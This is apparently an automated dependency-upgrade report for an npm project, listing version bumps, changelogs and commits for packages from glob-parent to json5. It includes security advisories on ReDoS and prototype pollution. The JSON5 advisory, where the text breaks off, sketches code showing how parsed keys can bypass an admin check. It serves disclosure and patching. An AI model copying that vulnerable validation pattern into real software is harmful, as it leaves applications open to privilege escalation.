v7.0.0...v7.0.1

7.0.0

Breaking

  • Require Node.js 16 70571f8
  • This package is now pure ESM. Please read this.
  • Removed getStream.array()
  • const getStream = require('get-stream'); getStream.buffer(โ€ฆ); โ†’ import {getStreamAsBuffer} from 'get-stream'; getStreamAsBuffer(โ€ฆ);
  • const getStream = require('get-stream'); getStream.MaxBufferError; โ†’ import {MaxBufferError} from 'get-stream'; MaxBufferError;

Tip

You may not need this package anymore.

v6.0.1...v7.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 68 commits:

โ†—๏ธ glob-parent (indirect, 5.1.2 โ†’ 6.0.2) ยท Repo ยท Changelog

Security Advisories ๐Ÿšจ

๐Ÿšจ glob-parent 6.0.0 vulnerable to Regular Expression Denial of Service

glob-parent 6.0.0 is vulnerable to Regular Expression Denial of Service (ReDoS). This issue is fixed in version 6.0.1.

This vulnerability is separate from GHSA-ww39-953v-wcq6.

Release Notes

6.0.2

Bug Fixes

6.0.1

Bug Fixes

  • Resolve ReDoS vulnerability from CVE-2021-35065 (#49) (3e9f04a)

6.0.0

โš  BREAKING CHANGES

  • Correct mishandled escaped path separators (#34)
  • upgrade scaffold, dropping node <10 support

Bug Fixes

  • Correct mishandled escaped path separators (#34) (32f6d52), closes #32

Miscellaneous Chores

  • upgrade scaffold, dropping node <10 support (e83d0c5)

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 16 commits:

โ†—๏ธ globals (indirect, 13.10.0 โ†’ 17.4.0) ยท Repo

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

โ†—๏ธ globby (indirect, 12.0.0 โ†’ 16.1.1) ยท Repo

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

โ†—๏ธ graceful-fs (indirect, 4.2.8 โ†’ 4.2.11) ยท Repo

Commits

See the full diff on Github. The new version differs by 17 commits:

โ†—๏ธ has-bigints (indirect, 1.0.1 โ†’ 1.1.0) ยท Repo ยท Changelog

Release Notes

1.1.0 (from changelog)

Commits

  • [meta] use npmignore to autogenerate an npmignore file a411cea
  • [actions] split out node 10-20, and 20+ 4515878
  • [New] add types c888241
  • [actions] update rebase action to use reusable workflow 6f44338
  • [Dev Deps] update @ljharb/eslint-config, auto-changelog, npmignore, tape ffa1e4d
  • [Dev Deps] update aud, tape 0f5d096
  • [meta] add missing engines.node 3f73c71
  • [Tests] replace aud with npm audit b007efd
  • [Dev Deps] add missing peer dep 459c612

1.0.2 (from changelog)

Commits

  • [actions] reuse common workflows a655b7f
  • [actions] use node/install instead of node/run; use codecov action 730a2e5
  • [readme] add github actions/codecov badges; update URLs 9a83788
  • [Dev Deps] update eslint, @ljharb/eslint-config, safe-publish-latest, tape b1edc52
  • [actions] update codecov uploader cbb1bd0
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, auto-changelog, tape 8717e6d
  • [Dev Deps] update eslint, @ljharb/eslint-config, auto-changelog, safe-publish-latest, tape 5f70eab
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, tape a1446bc
  • [meta] use prepublishOnly script for npm 7+ f2dd197
  • [actions] use checkout v3 1ba72f1
  • [Refactor] use a global variable to get the original BigInt instead of a global property a7ccfac
  • [actions] skip npm ls on older nodes 62d31e7

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 23 commits:

โ†—๏ธ has-symbols (indirect, 1.0.2 โ†’ 1.1.0) ยท Repo ยท Changelog

Release Notes

1.1.0 (from changelog)

Commits

  • [actions] update workflows 548c0bf
  • [actions] further shard; update action deps bec56bb
  • [meta] use npmignore to autogenerate an npmignore file ac81032
  • [New] add types 6469cbf
  • [actions] update rebase action to use reusable workflow 9c9d4d0
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, tape adb5887
  • [Dev Deps] update @ljharb/eslint-config, aud, tape 13ec198
  • [Dev Deps] update auto-changelog, core-js, tape 941be52
  • [Tests] replace aud with npm audit 74f49e9
  • [Dev Deps] update npmignore 9c0ac04
  • [Dev Deps] add missing peer dep 52337a5

1.0.3 (from changelog)

Commits

  • [actions] use node/install instead of node/run; use codecov action 518b28f
  • [meta] add bugs and homepage fields; reorder package.json c480b13
  • [actions] reuse common workflows 01d0ee0
  • [actions] update codecov uploader 6424ebe
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, auto-changelog, tape dfa7e7f
  • [Dev Deps] update eslint, @ljharb/eslint-config, safe-publish-latest, tape 0c8d436
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, tape 9026554
  • [readme] add actions and codecov badges eaa9682
  • [Dev Deps] update eslint, tape bc7a3ba
  • [Dev Deps] update eslint, auto-changelog 0ace00a
  • [meta] use prepublishOnly script for npm 7+ 093f72b
  • [Tests] test on all 16 minors 9b80d3d

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 25 commits:

โ†—๏ธ has-tostringtag (indirect, 1.0.0 โ†’ 1.0.2) ยท Repo ยท Changelog

Commits

See the full diff on Github. The new version differs by 14 commits:

โ†—๏ธ human-signals (indirect, 2.1.0 โ†’ 8.0.1) ยท Repo ยท Changelog

Release Notes

8.0.1

Documentation

  • Improve documentation in README.md

8.0.0

Breaking changes (types)

  • The SignalNumber and Signal['number'] types in TypeScript are now stricter. They only allow valid signal numbers like 1 or 9. They do not allow invalid signal numbers like -1, 1.5 or 999. Please note that 0 is not considered a valid signal number, although it can be passed to process.kill().

Types

  • The signalsByName[signalName] and signalsByNumber[signalNumber] types in TypeScript are now Signal instead of Signal | undefined. This means you can now do signalsByName[signalName].description instead of signalsByName[signalName]!.description.

7.0.0

Breaking changes (types)

  • The SignalName and Signal['name'] types in TypeScript are now stricter. They only allow valid signal names like 'SIGINT'. They do not allow lowercase signals like 'sigint' nor unknown signals like 'SIGOTHER'.

6.0.0

Breaking changes

  • Minimal supported Node.js version is now 18.18.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

โ†—๏ธ ignore (indirect, 4.0.6 โ†’ 7.0.5) ยท Repo ยท Changelog

Release Notes

7.0.4

  • PATCH Allows files named .{3,}, such as ... for Linux / macOS (#68)
ig.ignores('...')
ig.ignores('....')
// It will throw a RangeError in versions prior to 7.0.4, but it is ok if >= 7.0.4

An upgrade is recommended for all dependents

7.0.0

Minor feature

The primary feature introduced by 7.0.0 is the .checkIgnore() method, which is most equivalent to git check-ignore -v. And also it allows to pass {pattern, mark?} as the parameter of .add() so that we could imitate the mechanism of git check-ignore as:

ig.add({
  pattern: 'foo/*',
  mark: '60'
})

const {
  ignored,
  rule
} = checkIgnore('foo/')

if (ignored) {
  console.log(`.gitignore:${result}:${rule.mark}:${rule.pattern} foo/`)
}

// .gitignore:60:foo/* foo/

Potential Incompatibilities

The only situation that 7.0.0 might bring incompatibility is to .add() a < 7.0.0 instance into a >= 7.0.0 instance, which might occur when the current workspace has multiple node-ignore versions installed, please be careful.

const {anotherIgnoreInstance} = require('./ignore-6.0-instance')

// A 7.0.0 instance
ignore().add(anotherIgnoreInstance)

// It will break your code

Otherwise, in most cases, if you never do something above or there is only one version of node-ignore installed in the current workspace, it is quite safe to upgrade to 7.0.0.

5.3.0

5.3.0

  • MINOR export Options interface (#105)

An upgrade is safe for all dependents

It allows typing external methods which expect Options as a param, by importing the Options interface.

import {Options} from 'ignore'

5.2.4

  • PATCH fixes normal single asterisk and normal consecutive asterisks defined in gitignore spec (#57)
  • PATCH invalid trailing backslash will not throw unexpectedly

An upgrade is recommended for all dependents

The following rules could be not properly parsed with previous ignore versions

**foo
*bar
qu*ux
abc\   # `ignore` would throw if no whitespace after `\`

5.2.0

  • PATCH support readonly arrays of typescript. (#70)
  • MINOR bring backward compatibility with relative paths. (#75)

An upgrade is recommended for all dependents.

ignore().ignores('../foo/bar.js') // will throw

And the code below will not throw, however it is not recommended

ignore({
  allowRelativePaths: true
}).ignores('../foo/bar.js')

Recommend:

ignore().ignores('foo/bar.js')

5.1.9

  • PATCH fixes ignorecase when internal cache is hit. (#74)

An upgrade is recommended for all dependents.

5.1.5

  • PATCH fixes escaping for square brackets (#59)

An upgrade is recommended for all dependents.

5.1.1

  • PATCH fixes isPathValid on Windows (#54)

On Windows, if path is an absolute path, ig.ignores(path), ig.test(path) and related methods will now throw an error as expected.

5.1.0

  • FEATURE: Typescript: export interface Ignore (#53)

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

โ†—๏ธ import-fresh (indirect, 3.3.0 โ†’ 3.3.1) ยท Repo

Release Notes

3.3.1

v3.3.0...v3.3.1

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 4 commits:

โ†—๏ธ irregular-plurals (indirect, 3.3.0 โ†’ 3.5.0) ยท Repo

Release Notes

3.5.0

v3.4.1...v3.5.0

3.4.1

  • Fix compatibility with bundlers fe4ec96

v3.4.0...v3.4.1

3.4.0

v3.3.0...v3.4.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 7 commits:

โ†—๏ธ is-bigint (indirect, 1.0.3 โ†’ 1.1.0) ยท Repo ยท Changelog

Release Notes

1.1.0 (from changelog)

Commits

  • [actions] reuse common workflows 0e63a44
  • [meta] use npmignore to autogenerate an npmignore file 47584ee
  • [Tests] use for-each and es-value-fixtures f226864
  • [New] add types 78e2c47
  • [actions] split out node 10-20, and 20+ 4395a8d
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, auto-changelog, has-symbols, object-inspect, tape c188501
  • [Dev Deps] update eslint, @ljharb/eslint-config, object-inspect, safe-publish-latest, tape 5360d32
  • [actions] update rebase action to use reusable workflow d5c1775
  • [actions] update codecov uploader c7478c7
  • [Dev Deps] update @ljharb/eslint-config, auto-changelog, npmignore, object-inspect, tape 6fbce66
  • [meta] add missing engines.node 6f9ed42
  • [Tests] replace aud with npm audit 21846c3
  • [Dev Deps] remove unused has-symbols, add missing has-tostringtag b378d94
  • [Deps] update has-bigints f46c35b
  • [Dev Deps] add missing peer dep 2b9be16

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 21 commits:

โ†—๏ธ is-boolean-object (indirect, 1.1.2 โ†’ 1.2.2) ยท Repo ยท Changelog

Release Notes

1.2.2 (from changelog)

Fixed

  • [Fix] do not be tricked by fake Booleans #25

Commits

  • [Dev Deps] update @arethetypeswrong/cli, @ljharb/tsconfig, @types/tape, core-js a27608b
  • [Deps] update call-bound b19953f

1.2.1 (from changelog)

Commits

  • [Refactor] use call-bound directly bb5aa26

1.2.0 (from changelog)

Commits

  • [actions] reuse common workflows 380fa25
  • [meta] use npmignore to autogenerate an npmignore file befa203
  • [actions] split out node 10-20, and 20+ ca31663
  • [New] add types 6d58609
  • [Dev Deps] update eslint, @ljharb/eslint-config, core-js, safe-publish-latest, tape 06cc67e
  • [actions] update codecov uploader 0722346
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, auto-changelog, tape 100acdf
  • [actions] update rebase action to use reusable workflow 26333ff
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, core-js, tape fde97ee
  • [Dev Deps] update @ljharb/eslint-config, auto-changelog, core-js, npmignore, tape f5ed3c8
  • [Deps] update call-bind, has-tostringtag 61912e2
  • [Tests] replace aud with npm audit c6a0db5
  • [meta] better eccheck command 3a59ec6
  • [Dev Deps] add missing peer dep c0e10db

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 21 commits:

โ†—๏ธ is-builtin-module (indirect, 3.1.0 โ†’ 5.0.0) ยท Repo

Release Notes

5.0.0

Breaking

  • Remove punycode since it's deprecated

Improvements

v4.0.0...v5.0.0

4.0.0

Breaking

  • Require Node.js 18 52df82e
  • This package is now pure ESM. Please read this.
  • This package now matches based a static list of modules from the latest Node.js version. If you want to check for a module in the current Node.js (previous behavior), use the core isBuiltin method.

v3.2.1...v4.0.0

3.2.1

  • Module names that end in a trialing slash should not be considered builtin (#13) 4d9b398

v3.2.0...v3.2.1

3.2.0

v3.1.0...v3.2.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 10 commits:

โ†—๏ธ is-callable (indirect, 1.2.4 โ†’ 1.2.7) ยท Repo ยท Changelog

Release Notes

1.2.7 (from changelog)

Commits

  • [Fix] recognize document.all in IE 6-10 06c1db2
  • [Tests] improve logic for FF 20-35 0f7d9b9
  • [Fix] handle document.all in FF 27 (and +, probably) 696c661
  • [Tests] fix proxy tests in FF 42-63 985df0d
  • [readme] update tested browsers 389e919
  • [Fix] detect document.all in Opera 12.16 b9f1022
  • [Fix] HTML elements: properly report as callable in Opera 12.16 17391fe
  • [Tests] fix inverted logic in FF3 test 056ebd4

1.2.6 (from changelog)

Commits

  • [Fix] work for document.all in Firefox 3 and IE 6-8 015132a
  • [Test] skip function toString check for nullish values 8698116
  • [readme] add "supported engines" section 0442207
  • [Tests] skip one of the fixture objects in FF 3.6 a501141
  • [Tests] allow class constructor tests to fail in FF v45 - v54, which has undetectable classes b12e4a4
  • [Fix] Safari 4: regexes should not be considered callable 4b732ff
  • [Fix] properly recognize document.all in Safari 4 3193735

1.2.5 (from changelog)

Commits

  • [actions] reuse common workflows 5bb4b32
  • [meta] better eccheck command b9bd597
  • [meta] use npmignore to autogenerate an npmignore file 3192d38
  • [Fix] for HTML constructors, always use tryFunctionObject even in pre-toStringTag browsers 3076ea2
  • [Dev Deps] update eslint, @ljharb/eslint-config, available-typed-arrays, object-inspect, safe-publish-latest, tape 8986746
  • [meta] add auto-changelog 7dda9d0
  • [Fix] properly report document.all da90b2b
  • [actions] update codecov uploader c8f847c
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, object-inspect, tape 899ae00
  • [Dev Deps] update eslint, @ljharb/eslint-config, es-value-fixtures, object-inspect, tape 344e913
  • [meta] remove greenkeeper config 737dce5
  • [meta] npmignore coverage output 680a883

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 30 commits:

โ†—๏ธ is-core-module (indirect, 2.5.0 โ†’ 2.16.1) ยท Repo ยท Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by 64 commits:

โ†—๏ธ is-date-object (indirect, 1.0.5 โ†’ 1.1.0) ยท Repo ยท Changelog

Release Notes

1.1.0 (from changelog)

Commits

  • [actions] reuse common workflows 35c5af0
  • [meta] use npmignore to autogenerate an npmignore file db6113c
  • [New] add types 4f1d9b3
  • [actions] split out node 10-20, and 20+ c9a1e4f
  • [Dev Deps] update eslint, @ljharb/eslint-config, core-js, safe-publish-latest, tape 35a2864
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, auto-changelog, tape b670bca
  • [actions] update rebase action to use reusable workflow d6bb341
  • [actions] update codecov uploader f850678
  • [Robustness] use call-bound 18ed326
  • [Dev Deps] update @ljharb/eslint-config, auto-changelog, core-js, npmignore, tape f0e792f
  • [meta] add exports field 342351f
  • [Tests] replace aud with npm audit 9b9b9cf
  • [Deps] update has-tostringtag 1bc37ab
  • [meta] add sideEffects flag 86d3a16
  • [Dev Deps] add missing peer dep fee274d

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 16 commits:

โ†—๏ธ is-docker (indirect, 2.2.1 โ†’ 3.0.0) ยท Repo

Release Notes

3.0.0

Breaking

v2.2.1...v3.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 4 commits:

โ†—๏ธ is-glob (indirect, 4.0.1 โ†’ 4.0.3) ยท Repo

Commits

See the full diff on Github. The new version differs by 8 commits:

โ†—๏ธ is-negative-zero (indirect, 2.0.1 โ†’ 2.0.3) ยท Repo ยท Changelog

Release Notes

2.0.3 (from changelog)

Commits

  • add types e28f0d5
  • [meta] use npmignore to autogenerate an npmignore file f68ec13
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, auto-changelog, tape 70abff7
  • [actions] update rebase action to use reusable workflow 6e1356e
  • [Dev Deps] update @ljharb/eslint-config, aud, npmignore, tape c00d4ab
  • [meta] add sideEffects flag 9c45539

2.0.2 (from changelog)

Commits

  • [actions] reuse common workflows ece923d
  • [actions] use node/install instead of node/run; use codecov action 3a26f43
  • [meta] do not publish workflow files 2cea0c2
  • [readme] add github actions/codecov badges; update URLs 0c0be3e
  • [Dev Deps] update eslint, @ljharb/eslint-config, safe-publish-latest, tape a93d16e
  • [meta] create FUNDING.yml b4f425e
  • [actions] update codecov uploader 7999db3
  • [Dev Deps] update eslint, @ljharb/eslint-config, auto-changelog, safe-publish-latest, tape 140e4d9
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, tape 23a8b6d
  • [readme] add actions and codecov badges fe92126
  • [readme] fix repo URLs 50c428e
  • [Dev Deps] update eslint, @ljharb/eslint-config, tape 688155f
  • [meta] use prepublishOnly script for npm 7+ 83171f9
  • [actions] update workflows e9823db

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 22 commits:

โ†—๏ธ is-number-object (indirect, 1.0.6 โ†’ 1.1.1) ยท Repo ยท Changelog

Release Notes

1.1.1 (from changelog)

Commits

  • [Dev Deps] update @arethetypeswrong/cli, @ljharb/tsconfig, @types/tape 00d566d
  • [Refactor] use call-bound directly 073d5df
  • [Deps] update call-bind 36c84af

1.1.0 (from changelog)

Commits

  • [meta] use npmignore to autogenerate an npmignore file cb8423c
  • [New] add types 273e406
  • [actions] split out node 10-20, and 20+ 3da6267
  • [Robustness] use call-bind 834c098
  • [actions] update rebase action to use reusable workflow 84a8a9f
  • [Dev Deps] update @ljharb/eslint-config, auto-changelog, core-js, npmignore, tape 7275bca
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, core-js, tape 49a83aa
  • [Tests] replace aud with npm audit 061492b
  • [Refactor] avoid an expensive check, for null 08d29a8
  • [Deps] update has-tostringtag 4e2ad65
  • [Dev Deps] add missing peer dep 8228bfa

1.0.7 (from changelog)

Commits

  • [actions] reuse common workflows 8f9a1b0
  • [meta] better eccheck command 9dc8dff
  • [Dev Deps] update eslint, @ljharb/eslint-config, core-js, safe-publish-latest, tape c50ecbf
  • [actions] update codecov uploader f1a2560
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, core-js, tape 4b06ace
  • [Dev Deps] update eslint, @ljharb/eslint-config, auto-changelog, core-js, tape 3dc0e8b
  • [meta] add bugs/homepage package.json fields d7e0bcf

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 24 commits:

โ†—๏ธ is-plain-obj (indirect, 1.1.0 โ†’ 4.1.0) ยท Repo

Release Notes

4.1.0

v4.0.0...v4.1.0

4.0.0

Breaking

v3.0.0...v4.0.0

3.0.0

Breaking

Breaking for TypeScript users

  • Make the TypeScript types stricter (#10) e20ccc1

v2.1.0...v3.0.0

2.1.0

v2.0.0...v2.1.0

2.0.0

Breaking:

Enhancements:

v1.1.0...v2.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 24 commits:

โ†—๏ธ is-regex (indirect, 1.1.4 โ†’ 1.2.1) ยท Repo ยท Changelog

Release Notes

1.2.1 (from changelog)

Commits

  • [Refactor] use call-bound directly dbabfe3
  • [Deps] update call-bind, gopd d5343a0
  • [Dev Deps] update @arethetypeswrong/cli, @ljharb/tsconfig cc081eb

1.2.0 (from changelog)

Fixed

  • [Tests] allow tests to pass if zero traps are triggered #35

Commits

  • [actions] reuse common workflows be7bf6a
  • [New] add types 39066a4
  • [meta] use npmignore to autogenerate an npmignore file 8938588
  • [Refactor] reorganize code 2f76f26
  • [actions] split out node 10-20, and 20+ 8c9aedf
  • [meta] better eccheck command 6b39408
  • [Dev Deps] update eslint, @ljharb/eslint-config, safe-publish-latest, tape e38cf3c
  • [actions] update codecov uploader 487c75d
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, auto-changelog, core-js, foreach, tape 0d7da87
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, core-js, tape c1c1198
  • [actions] update rebase action to use reusable workflow 213646e
  • [Dev Deps] update @ljharb/eslint-config, auto-changelog, core-js, npmignore, tape 0a44e77
  • [Refactor] use hasown d939332
  • [Deps] update call-bind, has-tostringtag 46bfdc9
  • [Tests] use for-each instead of foreach 138b3f2
  • [Tests] replace aud with npm audit 37ed80a
  • [Deps] update gopd 6fd4097
  • [Dev Deps] update core-js 97c1c60
  • [Dev Deps] add missing peer dep 7329b8e

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 25 commits:

โ†—๏ธ is-stream (indirect, 2.0.1 โ†’ 4.0.1) ยท Repo

Release Notes

4.0.1

v4.0.0...v4.0.1

3.0.0

Breaking

v2.0.1...v3.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 9 commits:

โ†—๏ธ is-string (indirect, 1.0.7 โ†’ 1.1.1) ยท Repo ยท Changelog

Release Notes

1.1.1 (from changelog)

Commits

  • [Dev Deps] update @arethetypeswrong/cli, @ljharb/tsconfig, @types/tape c1f7ef7
  • [Refactor] use call-bound directly ba8a78f
  • [Deps] update call-bind 93c352f

1.1.0 (from changelog)

Commits

  • [actions] reuse common workflows 12aa75b
  • [meta] use npmignore to autogenerate an npmignore file 6401572
  • [actions] split out node 10-20, and 20+ 223540c
  • [New] add types 7e83d67
  • [Dev Deps] update eslint, @ljharb/eslint-config, core-js, safe-publish-latest, tape febd26e
  • [readme] add github actions/codecov badges; update URLs f6bf065
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, auto-changelog, core-js, tape 8afc37a
  • [Robustness] use call-bind ac86dd7
  • [actions] update rebase action to use reusable workflow 77058c8
  • [actions] update codecov uploader 4312be5
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, core-js, tape 98c3779
  • [Dev Deps] update @ljharb/eslint-config, auto-changelog, core-js, npmignore, tape 7d8e0e5
  • [Dev Deps] update eslint, @ljharb/eslint-config, core-js, safe-publish-latest, tape 3284ad1
  • [Tests] replace aud with npm audit 8cb7ea7
  • [Refactor] skip expensive check, for null 20fde50
  • [Deps] update has-tostringtag b67a78d
  • [meta] fix repo URL 1a2ee6b
  • [meta] better eccheck command 6913c75
  • [Dev Deps] add missing peer dep 8ac8551

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 24 commits:

โ†—๏ธ is-symbol (indirect, 1.0.4 โ†’ 1.1.1) ยท Repo ยท Changelog

Release Notes

1.1.1 (from changelog)

Commits

  • [actions] re-add finishers 9b9d06f
  • [Deps] update call-bind, has-symbols, safe-regex-test 07f3647
  • [Refactor] use call-bound directly 799402d
  • [Dev Deps] update @arethetypeswrong/cli, @ljharb/tsconfig 4b8b2f9
  • [types] remove unneeded DT packages 398abaa

1.1.0 (from changelog)

Commits

  • [actions] reuse common workflows acf85f0
  • [meta] use npmignore to autogenerate an npmignore file 77c818e
  • [Tests] use for-each and es-value-fixtures 93dfed0
  • [New] add types ed6a057
  • [actions] split out node 10-20, and 20+ 7f81ccc
  • [Robustness] use call-bind and safe-regex-test dc7e142
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, auto-changelog, object-inspect, tape 70f87c2
  • [Dev Deps] update eslint, @ljharb/eslint-config, object-inspect, safe-publish-latest, tape 3f02ff4
  • [Dev Deps] update @ljharb/eslint-config, auto-changelog, has-tostringtag, npmignore, object-inspect, tape 9588872
  • [actions] update rebase action to use reusable workflow 59e2f68
  • [actions] update codecov uploader e4759f8
  • [Dev Deps] update eslint, auto-changelog, object-inspect, tape 33990c0
  • [Tests] use has-tostringtag for more robust Symbol.toStringTag detection d6154e1
  • [Tests] replace aud with npm audit 3215a60
  • [Refactor] avoid an expensive check, for primitives 59f1a42
  • [Deps] update has-symbols 06be1a9
  • [Dev Deps] add missing peer dep 799b0da

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 24 commits:

โ†—๏ธ is-wsl (indirect, 2.2.0 โ†’ 3.1.1) ยท Repo

Release Notes

3.1.1

  • Fix detection of WSL with custom kernels 3846912

v3.1.0...v3.1.1

3.1.0

v3.0.0...v3.1.0

3.0.0

Breaking

v2.2.0...v3.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 9 commits:

โ†—๏ธ js-yaml (indirect, 3.14.1 โ†’ 4.1.1) ยท Repo ยท Changelog

Security Advisories ๐Ÿšจ

๐Ÿšจ js-yaml has prototype pollution in merge (<<)

Impact

In js-yaml 4.1.0, 4.0.0, and 3.14.1 and below, it's possible for an attacker to modify the prototype of the result of a parsed yaml document via prototype pollution (__proto__). All users who parse untrusted yaml documents may be impacted.

Patches

Problem is patched in js-yaml 4.1.1 and 3.14.2.

Workarounds

You can protect against this kind of attack on the server by using node --disable-proto=delete or deno (in Deno, pollution protection is on by default).

References

https://cheatsheetseries.owasp.org/cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html

๐Ÿšจ js-yaml has prototype pollution in merge (<<)

Impact

In js-yaml 4.1.0, 4.0.0, and 3.14.1 and below, it's possible for an attacker to modify the prototype of the result of a parsed yaml document via prototype pollution (__proto__). All users who parse untrusted yaml documents may be impacted.

Patches

Problem is patched in js-yaml 4.1.1 and 3.14.2.

Workarounds

You can protect against this kind of attack on the server by using node --disable-proto=delete or deno (in Deno, pollution protection is on by default).

References

https://cheatsheetseries.owasp.org/cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html

Release Notes

4.1.1 (from changelog)

Security

  • Fix prototype pollution issue in yaml merge (<<) operator.

4.1.0 (from changelog)

Added

  • Types are now exported as yaml.types.XXX.
  • Every type now has options property with original arguments kept as they were (see yaml.types.int.options as an example).

Changed

  • Schema.extend() now keeps old type order in case of conflicts (e.g. Schema.extend([ a, b, c ]).extend([ b, a, d ]) is now ordered as abcd instead of cbad).

4.0.0 (from changelog)

Changed

  • Check migration guide to see details for all breaking changes.
  • Breaking: "unsafe" tags !!js/function, !!js/regexp, !!js/undefined are moved to js-yaml-js-types package.
  • Breaking: removed safe* functions. Use load, loadAll, dump instead which are all now safe by default.
  • yaml.DEFAULT_SAFE_SCHEMA and yaml.DEFAULT_FULL_SCHEMA are removed, use yaml.DEFAULT_SCHEMA instead.
  • yaml.Schema.create(schema, tags) is removed, use schema.extend(tags) instead.
  • !!binary now always mapped to Uint8Array on load.
  • Reduced nesting of /lib folder.
  • Parse numbers according to YAML 1.2 instead of YAML 1.1 (01234 is now decimal, 0o1234 is octal, 1:23 is parsed as string instead of base60).
  • dump() no longer quotes :, [, ], (, ) except when necessary, #470, #557.
  • Line and column in exceptions are now formatted as (X:Y) instead of at line X, column Y (also present in compact format), #332.
  • Code snippet created in exceptions now contains multiple lines with line numbers.
  • dump() now serializes undefined as null in collections and removes keys with undefined in mappings, #571.
  • dump() with skipInvalid=true now serializes invalid items in collections as null.
  • Custom tags starting with ! are now dumped as !tag instead of !<!tag>, #576.
  • Custom tags starting with tag:yaml.org,2002: are now shorthanded using !!, #258.

Added

  • Added .mjs (es modules) support.
  • Added quotingType and forceQuotes options for dumper to configure string literal style, #290, #529.
  • Added styles: { '!!null': 'empty' } option for dumper (serializes { foo: null } as "foo: "), #570.
  • Added replacer option (similar to option in JSON.stringify), #339.
  • Custom Tag can now handle all tags or multiple tags with the same prefix, #385.

Fixed

  • Astral characters are no longer encoded by dump(), #587.
  • "duplicate mapping key" exception now points at the correct column, #452.
  • Extra commas in flow collections (e.g. [foo,,bar]) now throw an exception instead of producing null, #321.
  • __proto__ key no longer overrides object prototype, #164.
  • Removed bower.json.
  • Tags are now url-decoded in load() and url-encoded in dump() (previously usage of custom non-ascii tags may have led to invalid YAML that can't be parsed).
  • Anchors now work correctly with empty nodes, #301.
  • Fix incorrect parsing of invalid block mapping syntax, #418.
  • Throw an error if block sequence/mapping indent contains a tab, #80.

3.14.2 (from changelog)

Security

  • Backported v4.1.1 fix to v3

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

โ†—๏ธ jsesc (indirect, 2.5.2 โ†’ 3.1.0) ยท Repo

Commits

See the full diff on Github. The new version differs by 18 commits:

โ†—๏ธ json5 (indirect, 2.2.0 โ†’ 2.2.3) ยท Repo ยท Changelog

Security Advisories ๐Ÿšจ

๐Ÿšจ Prototype Pollution in JSON5 via Parse Method

The parse method of the JSON5 library before and including version 2.2.1 does not restrict parsing of keys named __proto__, allowing specially crafted strings to pollute the prototype of the resulting object.

This vulnerability pollutes the prototype of the object returned by JSON5.parse and not the global Object prototype, which is the commonly understood definition of Prototype Pollution. However, polluting the prototype of a single object can have significant security impact for an application if the object is later used in trusted operations.

Impact

This vulnerability could allow an attacker to set arbitrary and unexpected keys on the object returned from JSON5.parse. The actual impact will depend on how applications utilize the returned object and how they filter unwanted keys, but could include denial of service, cross-site scripting, elevation of privilege, and in extreme cases, remote code execution.

Mitigation

This vulnerability is patched in json5 v2.2.2 and later. A patch has also been backported for json5 v1 in versions v1.0.2 and later.

Details

Suppose a developer wants to allow users and admins to perform some risky operation, but they want to restrict what non-admins can do. To accomplish this, they accept a JSON blob from the user, parse it using JSON5.parse, confirm that the provided data does not set some sensitive keys, and then performs the risky operation using the validated data:

const JSON5 = require('json5');

const doSomethingDangerous = (props) => {
  if (props.isAdmin) {
    console.log('Doing dangerous thing as admin.');
  } else {
    console.log('Doing dangerous thing as user.');
  }
};

const secCheckKeysSet = (obj, searchKeys) => {
  let searchKeyFound = false;
  Object.keys(obj).forEach((key) => {
    if (searchKeys.indexOf(key) > -1) {
      searchKeyFound = true;
    }
  });
  return searchKeyFound;
};

const props = JSON5.parse('{"foo": "bar"}');
if (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) {
  doSomethingDangerous(props); // "Doing dangerous thing as user."
